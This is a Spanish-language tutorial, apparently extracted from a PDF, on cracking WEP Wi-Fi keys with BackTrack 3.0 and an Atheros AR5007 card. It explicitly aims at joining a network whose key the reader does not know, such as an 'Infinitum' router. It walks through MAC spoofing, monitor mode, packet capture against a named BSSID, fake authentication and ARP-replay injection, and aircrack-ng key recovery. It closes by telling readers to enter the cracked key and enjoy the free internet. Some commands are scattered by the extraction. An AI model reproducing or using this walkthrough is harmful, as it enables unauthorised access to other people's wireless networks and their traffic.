Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007
TUTORIAL PARA DESCIFRAR WEP CON BACKTRACK 3.0 PARA TARJETAS ATHEROS AR5007 En este tutorial explicaré como descifrar o crackear claves WEP de 64 y 128 bits paso a paso en muchos puntos de acceso WIFI y routers utilizando Backtrack 3.0, una distribución live de Linux. El principal objetivo de este tutorial es que queremos conectarnos a un punto de acceso que utiliza la encriptación WEP (generalmente Infinitum en México), pero no sabemos la clave. Vamos a atacar el router WIFI generando o capturando paquetes para así poder obtener la clave WEP. Este tutorial también es aplicable a muchas otras tarjetas wireless, pero me he dado a la tarea de escribirlo para la Atheros AR5007 (el cual deberá funcionar en los otros modelos), ya que algunas tarjetas de equipos nuevos son difíciles de levantar con otras distribuciones live (algunos pensarían que imposible), pues bien aquí les presento la solución paso a paso, principalmente pensado para principiantes en el mundo del Hacking.
Requisitos: • CD Backtrack 3.0 • Tarjeta Wireless Atheros AR5007 (en este caso) o alguno que sea compatible con el estándar 802.11.
Preparación de la tarjeta Wifi Paso 1. En primer lugar se debe de habilitar el “modo monitor” en la tarjeta wireless. Pero primeramente verificaremos si el sistema ha reconocido nuestra tarjeta wireless, para ello abriremos una Shell (ventana de comandos) y teclearemos el siguiente comando: iwconfig
By:
Reyes (
[email protected])
Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007
Deberá de aparecer algo similar a lo que a continuación se aprecia:
Y tomaremos nota de nuestro adaptador wireless, principalmente del nombre de la interfaz. Paso 2. Procederemos a detener nuestra interfaz, tecleamos lo siguiente: En general(sintaxis estándar para otras tarjetas). Airmon-ng stop [device] Para nuestro caso (usuarios con atheros): airmon-ng stop ath0
Paso 3. Tecleamos este comando para poder hacer el cambio de la dirección MAC: ifconfig [interface] down Para Atheros: ifconfig wifi0 down
Paso 4. Cambiamos la dirección MAC, tecleamos lo siguiente: macchanger –m 00:11:22:33:44:66 [device] By:
Reyes (
[email protected])
Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007
Para Atheros: macchanger –m 00:11:22:33:44:66 wifi0
Paso 5. En el siguiente paso al iniciar nuestra tarjeta se habilitará en modo monitor, tecleamos: airmon-ng start [device] Para Atheros: airmon-ng start wifi0
Atacar el objetivo Paso 6. Ahora buscaremos una red con seguridad WEP habilitada, para ello abriremos otra Shell (sin cerrar las anteriores) y teclearemos lo siguiente: airodump-ng [device] Para Atheros: airodump-ng ath0
Y desplegará lo siguiente:
By:
Reyes (
[email protected])
Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007
En este caso el objetivo es la red infinitum. Asegurese de tomar notade la dirección MAC(BSSID), el canal(CH) y el nombre de la red(ESSID). Paso 7. Ahora tenemos que recoger datos de los puntos de accesos WIFI para el ataque, Abriremos otra Shell y teclearemos lo siguiente: airodump-ng –c [channel] -w [filename] –bssid [bssid] [device]
Para Atheros: airodump-ng –c 8 –w paquetes –bssid 00:1F:B3:EC:09:F9 ath0
Este comando es la salida de datos recogido en un fichero que en nuestro caso es paquetes. Este archivo se genera y alimenta en el programa de WEP, con él descifraremos la clave WEP. Paso 8. Abriremos otra Shell y dejaremos el anterior en funcionamiento (de igual forma las anteriores y posteriores Shell). Ahora tenemos que generar algunos falsos paquetes al punto de acceso para acelerar la salida de datos y poder asociarnos a la red objetivo. Para esto introduciremos el siguiente comando: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
Para Atheros: aireplay-ng -1 0 –a INFINITUM7508 ath0
00:1F:B3:EC:09:F9
By:
–h
00:11:22:33:44:66
–e
Reyes (
[email protected])
Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007
Paso 9. A continuación generaremos un gran número de paquetes en la red Objetivo con el fin de descifrar la clave, tecleamos lo siguiente (En otra Shell): aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
Para Atheros: Aireplay-ng -3 –b 00:1F:B3:EC:09:F9 –h 00:11:22:33:44:66 ath0
Esto fuerza al punto de acceso a enviar un montón de paquetes que podamos utilizar para romper la clave WEP. Revise aerodump-ng y usted debería de ver los datos con la selección de llenado de los paquetes. (Pongo las imágenes diferentes ya que al hacer el tutorial no me fue posible encontrar las otras pantallas, pero es algo similar, guíese de los comandos).
Paso 10. Despues de unos 10,000 a 20,000 IVS (visto en #Data, en la pantalla anterior)pude comenzar a descifrar la clave WEP si no hay otras maquinas generando paquetes, introduzca este comando para probar:
By:
Reyes (
[email protected])
Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007 aireplay-ng -2 -p 0841 00:11:22:33:44:66 [device]
-c
FF:FF:FF:FF:FF:FF
-b
[bssid]
-h
aireplay -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b 00:1F:B3:EC:09:F9
-h
Para Atheros:
00:11:22:33:44:66 ath0
Paso 11. Una vez que haya suficientes paquetes comenzaremos con el crack, para ello tecle lo siguiente (note que el filename es el nombre del archivo que definimos en los primeros pasos): aircrack-ng -n 128 -b [bssid] [filename]-01.cap
Para Atheros: aircrack-ng -n 128 -b 00:1F:B3:EC:09:F9 paquetes-01.cap
By:
Reyes (
[email protected])
Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007
La “-n 128 ” significa una clave WEP de 128 bits de encriptación, intente una clave de 64 bits cambiando el valor de n a 64.
Una vez obtenida la clave lo copia y ya en Windows podrá introducirla (sin los dos puntos) para tener acceso a internet. Que lo disfrutes!!!!!
By:
Reyes (
[email protected])